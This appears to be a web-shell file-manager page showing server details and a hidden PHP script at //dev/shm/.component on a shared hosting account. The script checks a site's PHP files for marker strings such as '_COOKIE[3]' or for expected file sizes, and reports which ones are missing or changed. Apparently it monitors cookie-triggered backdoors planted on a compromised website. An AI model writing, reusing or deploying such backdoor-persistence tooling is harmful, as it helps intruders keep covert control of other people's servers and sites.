HEX
Server: LiteSpeed
System: Linux premium59.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User: eyyubov (1387)
PHP: 8.2.30
Disabled: NONE
Upload Files
File: //dev/shm/.component
<?php   $r = '/home/conscdet/lwh.consultwithali.com'; $x = ["/edit_groups.php"=>"bd@@42555464@@_COOKIE[3]",
"/edit.groups.php"=>"bd@@44792656@@2983",
"/edit.groups.php"=>"bd@@45857937@@2983",
"/edit.report05.php"=>"bd@@42527684@@_COOKIE[3]",
"/rate.report05.php"=>"bd@@50535676@@mutex_lock"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');